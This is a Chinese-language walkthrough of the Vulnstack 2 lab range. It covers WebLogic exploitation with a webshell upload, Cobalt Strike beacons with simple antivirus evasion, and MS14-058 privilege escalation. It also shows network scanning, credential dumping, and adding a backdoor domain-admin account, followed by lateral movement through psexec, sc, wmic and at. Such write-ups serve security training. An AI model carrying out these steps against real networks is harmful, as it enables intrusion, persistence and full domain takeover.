红日靶场-vulnstack(二)

14

环境搭建

  • 宿舍wifi环境,手头有两台笔记本,所以选择桥接模拟外网
  • WEB:两张网卡 vmnet0(设置桥接)/vmnet1(仅主机模式)
  • DC:vmnet1(仅主机模式)
  • PC:两张网卡 vmnet0(设置桥接)/vmnet1(仅主机模式)
  • web启动C:\Oracle\Middleware\user_projects\domains\base_domain下的startWebLogic
  • web服务器恢复到v1.3快照,并且使用de1ay\de1ay|1qaz@WSXde1ay\Admnistrator|1qaz@WSX或者web|1qaz@WSX登录(都试试,先进系统配好环境)

外网渗透

存在一些weblogic的cve,上传冰蝎马方便后续操作

image-1699758028859

内网渗透

cs生成shellcode简单做一下免杀,发现用冰蝎等工具直接运行exe会告警,所以创建一个bat去运行exe迂回一下

$ start /b C:/Users/Public/Pictures/1.bat

//1.bat内容
C:/Users/Public/Pictures/cs.exe

ms14-058提权

beacon> net view
[*] Tasked beacon to run net view
[+] host called home, sent: 104504 bytes
[+] received output:
List of hosts:


[+] received output:
 Server Name             IP Address                       Platform  Version  Type   Comment
 -----------             ----------                       --------  -------  ----   -------
[-] Error: 6118

这里出现6118,需要在pc和web都打开Computer Browser(开始->右键计算机->管理->配置->服务)

beacon> net view
[*] Tasked beacon to run net view
[+] host called home, sent: 104504 bytes
[+] received output:
List of hosts:

 Server Name             IP Address                       Platform  Version  Type   Comment
 -----------             ----------                       --------  -------  ----   -------
 DC                      10.10.10.10                      500       6.3      PDC    

这里只有dc,用portscan试试

beacon> portscan 10.10.10.0-10.10.10.255 1-1024,3389,5000-6000 arp 1024

image-1699758048172

抓取密码

image-1699758057409

派生一个smb的监听器,然后试试psexec,dc成功上线,但是pc失败了

image-1699758066912

beacon> shell net user b1ank 1qaz@WSX /add /domain
[*] Tasked beacon to run: net user b1ank 1qaz@WSX /add /domain
[+] host called home, sent: 67 bytes
[+] received output:
命令成功完成。

beacon> shell net group "Domain Admins" b1ank /add /domain
[*] Tasked beacon to run: net group "Domain Admins" b1ank /add /domain
[+] host called home, sent: 75 bytes
[+] received output:
命令成功完成。

创建一个中转的监听器,生成exe

image-1699758077915

image-1699758084543

copy C:\Users\Administrator\Pictures\beacon.exe \\10.10.10.201\c$

//session秒断
sc \\PC create backdoor binpath= "c:\beacon.exe"
sc \\PC start backdoor 

//360拦截
wmic /node:10.10.10.201 /user:test /password:fe1w0@WSX process call create "cmd.exe /c c:\beacon.exe"

//拒绝访问
at \\10.10.10.201 20:20:30 c:\beacon.exe

传个session到msf,用msf试试

image-1699758098758

image-1699758110472

用刚刚创建的账号密码执行命令

image-1699758127391

成功上线

image-1699758147425

Reference

靶场复现 – VulnStack 0x02